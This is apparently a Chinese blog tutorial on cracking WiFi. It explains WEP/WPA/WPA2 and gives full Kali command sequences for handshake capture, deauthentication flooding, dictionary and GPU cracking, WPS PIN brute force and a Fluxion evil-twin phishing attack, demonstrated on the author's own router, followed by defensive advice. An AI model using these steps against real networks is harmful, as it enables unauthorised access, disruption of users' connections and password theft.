一、 WiFi的加密方式

目前无线路由器里带有的加密模式主要有:WEPWPA-PSK(TKIP)WPA2-PSK(AES)WPA-PSK(TKIP)+WPA2-PSK(AES)


  • WEP是WiredEquivalentPrivacy的简称,802.11b标准里定义的一个用于无线局域网(WLAN)的安全性协议。WEP被用来提供和有线lan同级的安全性。LAN天生比WLAN安全,因为LAN的物理结构对其有所保护,部分或全部网络埋在建筑物里面也可以防止未授权的访问。经由无线电波的WLAN没有同样的物理结构,因此容易受到攻击、干扰。WEP的目标就是通过对无线电波里的数据加密提供安全性,如同端-端发送一样。WEP特性里使用了rsa数据安全性公司开发的rc4prng算法。如果你的无线基站支持MAC过滤,推荐你连同WEP一起使用这个特性(MAC过滤比加密安全得多)。尽管从名字上看似乎是一个针对有线网络的安全选项,其实并不是这样。

WEP标准在无线网络的早期已经创建,目标是成为无线局域网WLAN的必要的安全防护层,但是WEP的表现无疑令人非常失望。它的根源在于设计上存在缺陷。在使用WEP的系统中,在无线网络中传输的数据是使用一个随机产生的密钥来加密的。但是,WEP用来产生这些密钥的方法很快就被发现具有可预测性,这样对于潜在的入侵者来说,就可以很容易的截取和破解这些密钥。即使是一个中等技术水平的无线黑客也可以在两到三分钟内迅速的破解WEP加密。

IEEE802.11的动态有线等效保密(WEP)模式是二十世纪九十年代后期设计的,当时功能强大的加密技术作为有效的武器受到美国严格的出口限制。由于害怕强大的加密算法被破解,无线网络产品是被被禁止出口的。然而,仅仅两年以后,动态有线等效保密模式就被发现存在严重的缺点。但是二十世纪九十年代的错误不应该被当著无线网络安全或者IEEE802.11标准本身,无线网络产业不能等待电气电子工程师协会修订标准,因此他们推出了动态密钥完整性协议TKIP(动态有线等效保密的补丁版本)。

尽管WEP已经被证明是过时且低效的,但是今天在许多现代的无线访问点和无线路由器中,它依然被支持的加密模式。不仅如此,它依然是被个人或公司所使用的最多的加密方法之一。如果你正在使用WEP加密,如果你对你的网络的安全性非常重视的话,那么以后尽可能的不要再使用WEP,因为那真的不是很安全。



  • 无线网络最初采用的安全机制是WEP(有线等效加密),但是后来发现WEP是很不安全的,802.11组织开始著手制定新的安全标准,也就是后来的802.11i协议。但是标准的制定到最后的发布需要较长的时间,而且考虑到消费者不会因为为了网络的安全性而放弃原来的无线设备,因此Wi-Fi联盟在标准推出之前,在802.11i草案的基础上,制定了一种称为WPA(Wi-FiProctedAccess)的安全机制,它使用TKIP(临时密钥完整性协议),它使用的加密算法还是WEP中使用的加密算法RC4,所以不需要修改原来无线设备的硬件,WPA针对WEP中存在的问题:IV过短、密钥管理过于简单、对消息完整性没有有效的保护,通过软件升级的方法提高网络的安全性。

WPA的出现给用户提供了一个完整的认证机制,AP根据用户的认证结果决定是否允许其接入无线网络中;认证成功后可以根据多种方式(传输数据包的多少、用户接入网络的时间等)动态地改变每个接入用户的加密密钥。另外,对用户在无线中传输的数据包进行MIC编码,确保用户数据不会被其他用户更改。作为802.11i标准的子集,WPA的核心就是IEEE802.1x和TKIP(TemporalKeyIntegrityProtocol)。

WPA考虑到不同的用户和不同的应用安全需要,例如:企业用户需要很高的安全保护(企业级),否则可能会泄露非常重要的商业机密;而家庭用户往往只是使用网络来浏览Internet、收发E-mail、打印和共享文件,这些用户对安全的要求相对较低。为了满足不同安全要求用户的需要,WPA中规定了两种应用模式:企业模式,家庭模式(包括小型办公室)。根据这两种不同的应用模式,WPA的认证也分别有两种不同的方式。

对于大型企业的应用,常采用"802.1x+EAP"的方式,用户提供认证所需的凭证。但对于一些中小型的企业网络或者家庭用户,WPA也提供一种简化的模式,它不需要专门的认证服务器。这种模式叫做"WPA预共享密钥(WPA-PSK)",它仅要求在每个WLAN节点(AP、无线路由器、网卡等)预先输入一个密钥即可实现。这个密钥仅仅用于认证过程,而不用于传输数据的加密。数据加密的密钥是在认证成功后动态生成,系统将保证"一户一密",不存在像WEP那样全网共享一个加密密钥的情形,因此大大地提高了系统的安全性。



  • 在802.11i颁布之后,Wi-Fi联盟推出了WPA2,它支持AES(高级加密算法),因此它需要新的硬件支持,它使用CCMP(计数器模式密码块链消息完整码协议)。在WPA/WPA2中,PTK的生成依赖PMK,而PMK获的有两种方式,一个是PSK的形式就是预共享密钥,在这种方式中PMK=PSK,而另一种方式中,需要认证服务器和站点进行协商来产生PMK。

IEEE802.11所制定的是技术性标准,Wi-Fi联盟所制定的是商业化标准,而Wi-Fi所制定的商业化标准基本上也都符合IEEE所制定的技术性标准。WPA(Wi-FiProtectedAccess)事实上就是由Wi-Fi联盟所制定的安全性标准,这个商业化标准存在的目的就是为了要支持IEEE802.11i这个以技术为导向的安全性标准。而WPA2其实就是WPA的第二个版本。WPA之所以会出现两个版本的原因就在于Wi-Fi联盟的商业化运作。

我们知道802.11i这个任务小组成立的目的就是为了打造一个更安全的无线局域网,所以在加密项目里规范了两个新的安全加密协定–TKIP与CCMP(有些无线网路设备中会以AES、AES-CCMP的字眼来取代CCMP)。其中TKIP虽然针对WEP的弱点作了重大的改良,但保留了RC4演算法和基本架构,言下之意,TKIP亦存在著RC4本身所隐含的弱点。因而802.11i再打造一个全新、安全性更强、更适合应用在无线局域网环境的加密协定-CCMP。所以在CCMP就绪之前,TKIP就已经完成了。但是要等到CCMP完成,再发布完整的IEEE802.11i标准,可能尚需一段时日,而Wi-Fi联盟为了要使得新的安全性标准能够尽快被布署,以消弭使用者对无线局域网安全性的疑虑,进而让无线局域网的市场可以迅速扩展开来,因而使用已经完成TKIP的IEEE802.11i第三版草案(IEEE802.11idraft3)为基准,制定了WPA。而于IEEE完成并公布IEEE802.11i无线局域网安全标准后,Wi-Fi联盟也随即公布了WPA第2版(WPA2)。



  • 这是目前无线路由里最高的加密模式,目前这种加密模式因为兼容性的问题,还没有被很多用户所使用。目前最广为使用的就是WPA-PSK(TKIP)和WPA2-PSK(AES)两种加密模式。相信在经过加密之后的无线网络,一定能够让我们的用户安心放心的上网冲浪。所以此种方式安全性很高但是考虑到兼容性问题,没有得到广泛使用。

二、针对WiFi密码破解方法

1. 主流方法:
  • 不需要技术的破解方法,利用手机端"WiFi万能钥匙"等软件蹭网。
  • 在抓到客户端与目标WiFi的握手包后实施基于密码字典的暴力破解,成功率取决于目标WiFi的密码强度、字典的大小或准确度、实施爆破的机器运算性能。
  • 在开启了wps功能的WiFi,使用pin码猜解的方法获得WiFi密码。
  • 使用fluxion对WIFI进行攻击,创建钓鱼热点对WIFI密码进行收集
2. 原理:


  • WiFi万能钥匙"类App的真正原理是,收集用户手机上成功连接过的WiFi账号和密码,并上传、存储到App的服务器上,等到附近的蹭网者搜索到同一个网络时,该App就可以根据附近热点的配置信息,从服务器上自动匹配并取得相应的密码,通过数据流量发送到手机端,从而完成WiFi连网。



  • 普通的无线路由器,加密方法一般使用wpa 、wpa2或wep,wep因为太不安全极易被破解在现行的无线路由器上已基本取消。所以我们搜索到的待破WiFi基本都是wpa或wpa2加密的。至于使用认证服务器(如radius等)的wpa认证在个人无线WiFi领域基本不可能,所以通常我们能搜索到的待破WiFi都是基于本地密码的wpa或wpa2加密WiFi。

破解wpa和wpa2加密的WiFi网络的基本原理通俗来讲,我们需要先在无线网卡监听模式下搜集目标WiFi的信息,例如ssid(WiFi名称)、BSSID(也就是目标WiFi无线路由器的MAC)、已连接的客户端mac、信号强度等信息。然后发送伪造的取消关联的数据包迫使已连接到该WiFi的客户端与WiFi断开连接,重点是,断开连接后,客户端会重新尝试发起连接到该WiFi网络,这时客户端会发送一个带有认证密码的数据包以便请求重新连入WiFi,这个包俗称为握手包。这时我们的攻击机利用攻击程序和无线网卡监听抓取到这个握手包,这个握手包里就含有WiFi密码,但这个密码当然是经过加密的,所以后续就需要我们使用攻击程序调用密码字典结合获取到的BSSID、客户端MAC等信息进行运算,不断运算字典中的每一个密码,直到有一个密码使用wpa算法能算出一个与抓到的握手包中一致的加密字串,这个就是目标WiFi的密码了。如果把字典里的每一个密码都算过一遍仍然没有一个与抓取到的握手包加密字串一致的,就破解失败,退出,构造新的字典再试。



  • 在早期的无线路由器上开启了wps功能,这个功能简单来讲就是为了方便设备连接WiFi,不需要每次都繁琐的输入密码而设立的一个8位的纯数字字串,客户端可以通过pin码快速关联路由器WiFi。wps这个功能的设计初衷是方便用户连接WiFi,却成为破解WiFi最有效的手段,因为8位纯数字的pin码,最多只有1亿种可能的组合,而由于最后一位是前七位的校验和,所以只需要猜解前七位,猜解的可能组合数就只有一千万种了,又由于发送pin码连接WiFi,pin码前4位出错的返回报错内容和后三位错误的返回报错报文内容不同,所以只需要先猜前四位,前四位对了再猜后面三位,都对了以后最后一位校验和自动可算出来,所以实际最多只需要猜解10000+1000种组合,一般我们2秒种尝试一个pin码,那么理论上最多花费6个小时就一定可以猜解出目标路由器的pin码,进而获取到WiFi密码。

需要说明的是,尽管pin码破解WiFi被认为是最有效的WiFi破解手段,但在实际中不容易实现,一是因为pin码不安全的问题已广泛的被无线路由器的生产厂商所重视,所以现今购买的无线路由器基本都已经取消了这个wps功能。二是在pin的过程中需要不断的向目标路由器发送pin码进行尝试,对方路由器要返回响应报文,有时因路由器本身不稳定或路由器性能等问题,路由器不知不觉就被我们pin死了,使得猜解不能继续或路由器在接收到过多错误的pin码之后会自动休息一段时间,期间不接收pin码,这导致我们pin码猜解的时间过长而没有意义。



  • 使用fluxion对WIFI进行攻击,创建钓鱼热点对WIFI密码进行收集

三、破解过程实例


注意:破解其他人的wifi密码是“犯罪”,so,don’t;我使用自己的无线路由器演示。

知道了攻击方法,自然就知道怎么防范WiFi·攻击,更好的防范攻击。

附件:《中国网络安全法》

WPA/WPA2-PSK

1. 准备工具
  • 笔记本
  • USB无线上网卡(必备) 注:需支持kali的无线网卡
  • kali系统
  • 密码字典
2. 第一种方法:暴力破解法

暴力破解,就是一个一个密码去试,直到正确的密码。

现在的wifi一般加密都是:

  • WEP(有线等效加密)——采用WEP64位或者128位数据加密。
  • WPA-PSK[TKIP]———采用预共享秘钥的WI-FI保护访问,采用WPA-PSK标准加密技术,加密类型为TKIP。
  • WPA-PSK[TKIP]+WPA2-PSK[AES]———允许客户端使用WPA-PSK[TKIP]或者WPA2-PSK[AES]。
3. 开始实验:
1)装载网卡:

打开虚拟机,可移动设备>usb网卡>连接主机

2)查询可用网卡,进入监控模式。
root@ET:~# airmon-ng

列出支持监控模式的无线网卡。如果没有任何输出,表示无线网卡不支持监控模式。可以看到wlan0支持监控模式。

root@ET:~# airmon-ng start wlan0

执行成功之后网卡接口变为wlan0mon;可以使用ifconfig或ip a命令查看。

root@ET:~# ifconfig
​
root@ET:~# ip a

3)列出了周围的wifi和它们的详细信息

包括信号强度、加密类型、频道等。要记住要破解wifi的频道号和BSSID。

按Ctrl-C结束。

root@ET:~# airodump-ng wlan0mon

CH  9 ][ Elapsed: 8 mins ][ 2019-09-14 10:30                                         
                                                                                                                                                                                           
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
​
BC:5F:F6:B4:F4:0D  -31      116        0    0  11  270  WPA2 CCMP   PSK  MERCURY_F40D

这是我自己的路由器,对他进行破解。

4)抓取握手包

使用网卡的监听模式抓取周围的无线网络数据包。

其中,对我们最重要的数据包是:包含密码的包-也叫握手包。当有新用户或断开用户自动连接wifi时,会发送握手包。

root@ET:~# airodump-ng -c 11 --bssid BC:5F:F6:B4:F4:0D -w /test wlan0mon

参数解释:

  • -c指定频道号
  • –bssid指定路由器bssid
  • -w指定抓取的数据包保存位置

这是该路由器所连接的设备,这设备是我的手机。

5)强制连接到wifi的设备重新连接路由器(洪水攻击)

打开新终端执行:

root@ET:~# aireplay-ng -0 0 -a BC:5F:F6:B4:F4:0D -c 94:65:2D:E0:D1:D9 wlan0mon

参数解释:

  • -0表示发起deauthentication攻击
  • -a指定无线路由器BSSID
  • -c指定强制断开的设备

不断对该WiFi下设备进行攻击,使其不能正常上网。

当成功抓取握手,ctrl+c停止攻击,ctrl+c停止抓包。

6)结束无线网卡的监控模式

得到了想要的握手包了,可以结束无线网卡的监控模式

root@ET:~# airmon-ng stop wlan0mon

7) 生成字典

kali系统自带字典,也可自己生成字典。

kali中,使用crunch生成密码字典:

举个例子

生成4个数字组合的密码字典:

root@ET:~# crunch 4 4 0123456789 -o ~/wordlist.txt

第一个4代表生成的字符串最短几个字符,第二个4代表生成的字符串最长几个字符。

生成4个字母和1980组合的密码字典:

root@ET:~# crunch 8 8 abcdefghiABCDE -t @@@@1980 -o ~/wordlist.txt

字符集必须按小写,大写,数字,符号的顺序,使用做为转译字符。

生成4个小写字母4个数字组合的密码字典:

root@ET:~# crunch 8 8 -t @@@@%%%% -o ~/wordlist.txt

更多信息,查看crunch的man手册,写的非常详细:

root@ET:~# man crunch

windows中,使用工具生成密码字典:

解压kali自带字典:

root@ET:~# gzip -d /usr/share/wordlists/rockyou.txt.gz
8) 开始破解密码
root@ET:~# aircrack-ng -a2 -b BC:5F:F6:B4:F4:0D -w /usr/share/wordlists/rockyou.txt /test.cap
​
                              Aircrack-ng 1.5.2 
​
      [00:00:01] 7364/7673 keys tested (4748.23 k/s) 
​
      Time left: 0 seconds                                      95.97%
​
                          KEY FOUND! [ gz19031903 ]
​
​
      Master Key     : B3 89 22 30 6D 96 8B 8E E5 74 7D A1 7F 7B E8 EC 
                       D1 A2 D0 7E A5 FB 56 7D A2 B2 2A 5B 57 68 60 D1 
​
      Transient Key  : 17 D4 8F 21 C1 EE 88 16 5D 50 AA 21 B4 73 DD 68 
                       6F 47 85 D0 5F BF 5F 00 00 00 00 00 00 00 00 00 
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
​
      EAPOL HMAC     : 6E 1E 27 32 D9 BB B6 CD C6 5C FB 09 A5 76 B7 EF 
​

KEY FOUND! [ gz19031903 ] //密码为gz19031903

9)使用GPU显卡的运算能力(可选)

如果你有一个强大的GPU,为什么不使用GPU跑字典呢?

Hashcat可以借助GPU的运算力破解各种不同算法的hash值。

下载时要注意选择正确的显卡类型(AMD、NVidia)。Kali Linux自带这个工具。

在破解cap文件之前,要把它转换为hccap文件:

root@ET:~# aircrack-ng /test.cap -J test.hccap

使用GPU破解hash:

root@ET:~# hashcat -m 2500 test.hccap /usr/share/wordlists/rockyou.txt

WEP

WEP是无线路由器最初广泛使用的一种加密方式,这种加密方式非常容易被破解。

目前很少有人使用wep加密方式,但是还是会有。

建议:使用WPA/WPA2做为加密方式。

1)抓取握手包:
root@ET:~# airodump-ng -c 11 --bssid BC:5F:F6:B4:F4:0D -w /test wlan0mon

参数解释:

  • -c指定频道号
  • –bssid指定路由器bssid
  • -w指定抓取的数据包保存位置

2)加快Beacons和Data数据的收集速度

和破解WPA/WPA2不同的是,它只要抓取到足够的Beacons和Data数据就可以破解,理想情况下是100000+。你可以等,也可以使用aireplay加快这个进程。

root@ET:~# aireplay-ng -1 0 -a BC:5F:F6:B4:F4:0D wlan0mon
root@ET:~# aireplay-ng -3 -b BC:5F:F6:B4:F4:0D wlan0mon

等到抓取的数据充足,Ctrl+C停止。

3)开始破解:
root@ET:~# aircrack-ng /*.cap
4)结束无线网卡的监控模式:
root@ET:~#  airmon-ng stop wlan0mon

总结:避免使用WEP加密方式

Pin

来自wikipeida:

Wi-Fi保护设置(简称WPS,全称Wi-Fi Protected Setup)是一个无线网络安全标准,旨在让家庭用户使用无线网络时简化加密步骤。此标准由Wi-Fi联盟(Wi-Fi Alliance)于2006年制定。

在2011年12月28日安全专家Stefan Viehbock报出此标准的一个重大安全漏洞,此漏洞允许远程攻击者使用暴力攻击在几小时内就能获取WPS的PIN码和WPA/WPA2的PSK码。一些新出产的无线路默认启动WPS功能,所以现在建议用户关闭无线路由器上的WPS一键加密功能,虽然有些无线器上无法关闭此功能。

WPS的目的是简化用户输入密码的步骤;在某个设备连接wifi,需要输入密码时,只要按一下无线路由器上的wps按钮就便可连接wifi。

如果无线路由器开启了WPS,就不必使用上面的破解方法了。

WPS的pin码并没有加密。Reaver会暴力破解pin码,找到pin码也就找到了密码。一般用时也不短。因为pin码为纯数字。

注意:

  • 网卡支持数据包注入,一般笔记本不支持
  • 要求无线信号强
  • 如果发送pin码过快,有可能造成路由器崩溃;就类似对服务器的DDOS攻击。
  • Reaver有很多选项,我只使用最基本的选项,你也许需要根据情况使用其他选项。
1)打开无线网卡监控模式:
root@ET:~# airmon-ng start wlan0

2)找到开启WPS功能的无线路由器:

不需用逐一测试,而是使用wash命令

root@ET:~# wash -i wlan0mon -C

如果什么也没有表示周围没有开启WPS的无线路由器。记住要破解wifi的BSSID。

3)开始破解密码
root@ET:~# reaver -i wlan0mon -b BC:5F:F6:B4:F4:0D -vv -a

等待2-10小时:

最后,不要忘了结束无线网卡的监控模式。

4)结束无线网卡的监控模式
root@ET:~# airmon-ng stop wlan0mon

总结:wps这个功能不用就把它关闭了吧。

破解隐藏WIFI

隐藏SSID就是把你路由器的AP隐藏起来,不让别人搜索到。请注意,这样的话,在连接wifi时就要手动输入AP名。

以我的路由器为例,将路由器的开启无线广播的√去掉,wifi即可对外隐藏。

1)打开无线网卡监控模式:
root@ET:~# airmon-ng start wlan0

2)搜索隐藏WIFI
root@ET:~# airodump-ng wlan0mon

ctrl+c停止搜索

3)将隐藏的WiFi进行监控:
root@ET:~# airodump-ng -c 11 --bssid BC:5F:F6:B4:F4:0D wlan0mon

只看到了 length 0,没有ap名。

4)对设备进行洪水攻击

打开新终端执行:

root@ET:~# aireplay-ng -0 0 -a BC:5F:F6:B4:F4:0D -c 94:65:2D:E0:D1:D9 wlan0mon

参数解释:

  • -0表示发起deauthentication攻击
  • -a指定无线路由器BSSID
  • -c指定强制断开的设备

不断对该WiFi下设备进行攻击,使其不能正常上网。

5)获取AP名

在kali系统中:

使用wireshark打开所抓取的握手包,查看内容中的ssid后的内容即是wifi名

在window系统中:

使用Wireshark或者Elcomsoft Wireless Security Auditor(简称ewsa)软件打开握手包:

破解密码的方法不变;使用上面方法就可以轻松得到ap名。ssid=MERCURY_F40D。

6)开始破解

解压kali自带字典:

root@ET:~# gzip -d /usr/share/wordlists/rockyou.txt.gz

开始破解:

root@ET:~# aircrack-ng -a2 -b BC:5F:F6:B4:F4:0D -w /usr/share/wordlists/rockyou.txt /test.cap

Aircrack-ng 1.5.2 
​
      [00:00:01] 7364/7673 keys tested (4748.23 k/s) 
​
      Time left: 0 seconds                                      95.97%
​
                          KEY FOUND! [ gz19031903 ]
​
​
      Master Key     : B3 89 22 30 6D 96 8B 8E E5 74 7D A1 7F 7B E8 EC 
                       D1 A2 D0 7E A5 FB 56 7D A2 B2 2A 5B 57 68 60 D1 
​
      Transient Key  : 17 D4 8F 21 C1 EE 88 16 5D 50 AA 21 B4 73 DD 68 
                       6F 47 85 D0 5F BF 5F 00 00 00 00 00 00 00 00 00 
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
​
      EAPOL HMAC     : 6E 1E 27 32 D9 BB B6 CD C6 5C FB 09 A5 76 B7 EF 
​

KEY FOUND! [ gz19031903 ] //密码为gz19031903

总结:事实证明,隐藏SSID并不管用;其实设置一个复杂的密码比隐藏SSID要管用的多。

钓鱼获取密码

Fluxion:是一个无线破解工具,这款软件可以帮你挤掉wifi主人的网络,让路由器无线功能相对来说处于瘫痪状态。

1)Fluxion工作原理

  1.扫描能够接收到的WIFI信号

  2.抓取握手包(这一步的目的是为了验证WiFi密码是否正确)

  3.使用WEB接口

  4.启动一个假的AP实例来模拟原本的接入点

  5.然后会生成一个MDK3进程。如果普通用户已经连接到这个WiFi,也会输入WiFi密码

  6.随后启动一个模拟的DNS服务器并且抓取所有的DNS请求,并且会把这些请求重新定向到一个含有恶意脚本 的HOST地址

  7.随后会弹出一个窗口提示用户输入正确的WiFi密码

  8.用户输入的密码将和第二步抓到的握手包做比较来核实密码是否正确

  9.这个程序是自动化运行的,并且能够很快的抓取到WiFi密码

2)安装fluxion
root@ET:~# git clone https://www.github.com/FluxionNetwork/fluxion.git
3)启动脚本
root@ET:~# cd fluxion
 root@ET:~# ./fluxion

这时fluxion会检查它必须的组件,如果没有的话它会自动安装

4)选项

选择 17中文

5)对目标进行抓包

选择2

选择3,对所有频道进行扫描

等待时间扫描,之后它会将附近所有信道的AP列出,ctrl+c停止

选择20 ,该路由器是我的个人路由器。进入下一个页面,为目标跟踪选择无线接口,选择2,跳过。

如果之前使用过该软件攻击,则重置攻击。无就进入下一个页面,选择2解除认证攻击

进去下一个页面,选择2 aircrack-ng

跳转出3个窗口,分别为监控,攻击,检索握手包,窗口。

当前所有设备都不能进行使用,直到抓取握手包,自动停止攻击。

6)选择攻击方式

选择1,创建钓鱼热点(双胞胎接入点)

选择Y,对目标攻击

选择2.跳过

选择2,重置攻击,选择2,wlan0接口。

选择2,进行airbase-ng方式攻击

刚刚已经抓取握手包,所以选择1,如果有握手包也可跳过上面抓包过程。

选择2 aircrack-ng验证

选择1创建证书。

为了加快效果,选择1,让该路由器无线功能瘫痪。

选择3,中文认证页面。

跳出6个窗口,分别为洪水攻击窗口,监控窗口,密码窗口,开启同名热点,开启钓鱼页面。

此时,该路由器下所有设备,都不能上网,路由器无线功能跟没有一样。

在aircrack-ng验证洪水攻击下,任何设备都不能该连接路由。

7)获得密码

如果客户提交密码,Fluxion将进行处理和验证。如果密码正确,Fluxion将自行终止,停止所有攻击,并显示密码。

提交后:

密码:gz19031903

fluxion将日志保存在/root/[ESSID]-password.txt下。

四、如何防止被蹭网

(1) 设置复杂密码:

密码包含字符、符号和数字,长度设置到12位以上,越复杂的无线密码对方破解难度越大。加密方式选用WPA-PSK/WPA2-PSK加密方式。

(2)定期更换密码:

每隔三个月更换一次密码。

(3) 设置白名单:

开启MAC地址过滤功能,手动把自己家里上网设备的MAC地址添加进来,这时即使有人破解了WIFI密码也无法上网。

最后修改:2020 年 09 月 25 日 03 : 41 PM
如果觉得我的文章对你有用,请随意赞赏